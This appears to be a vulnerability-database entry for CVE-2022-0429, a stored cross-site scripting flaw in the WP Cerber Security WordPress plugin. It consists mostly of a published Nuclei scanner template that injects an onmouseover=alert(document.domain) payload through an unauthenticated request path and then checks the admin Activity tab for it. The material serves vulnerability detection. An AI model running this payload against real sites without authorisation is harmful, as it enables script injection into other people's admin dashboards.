CVE-2022-0429: WP Cerber Security, Anti-spam & Malware Scan < 8.9.6 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WP Cerber Security | POC: 已公开

漏洞描述

The WP Cerber Security, Anti-spam & Malware Scan WordPress plugin before 8.9.6 does not sanitise the $url variable before using it in an attribute in the Activity tab in the plugins dashboard, leading to an unauthenticated stored Cross-Site Scripting vulnerability.

PoC代码[已公开]

id: CVE-2022-0429

info:
  name: WP Cerber Security, Anti-spam & Malware Scan < 8.9.6 - Cross-Site Scripting
  author: s4e-io
  severity: medium
  description: |
    The WP Cerber Security, Anti-spam & Malware Scan WordPress plugin before 8.9.6 does not sanitise the $url variable before using it in an attribute in the Activity tab in the plugins dashboard, leading to an unauthenticated stored Cross-Site Scripting vulnerability.
  reference:
    - https://wpscan.com/vulnerability/d1b6f438-f737-4b18-89cf-161238a7421b/
    - https://www.wiz.io/vulnerability-database/cve/cve-2022-0429
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0429
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0429
    cwe-id: CWE-79
    epss-score: 0.01033
    epss-percentile: 0.76572
    cpe: cpe:2.3:a:cerber:wp_cerber_security\,_anti-spam_\&_malware_scan:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cerber
    product: wp_cerber_security\,_anti-spam_\&_malware_scan
    framework: wordpress
  tags: cve,cve2022,wp,wp-plugin,wpscan,wordpress,xss,wp-cerber,authenticated

flow: http(1) && http(2)

http:
  - raw: # send payload (unauth), content-length is required
      - |
        POST /"/onmouseover=alert(document.domain);// HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 100

        a[b][c][d][e][f][g][h][i][j][k][l][m][n][o][p][q][r][s][t][u][v][w][x][y][z][1][2][3][4][5][6]=12345

    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "RID")'
          - "status_code == 403"
        condition: and
        internal: true

  - raw:
      - | #check payload result (auth)
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=cerber-security&tab=activity HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '<wbr>/"<wbr>/onmouseover=alert(document.domain);<wbr>/<wbr>/</p>'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022072765acbc4595d8989d747da20173d30a7a5c46dcf7635109ad8852d558ffd4e022100e49e70b9c7d15ac610fd4e035074ccfdb304215055a3824d447eb1157137a250:922c64590222798bb761d5b6d8e72950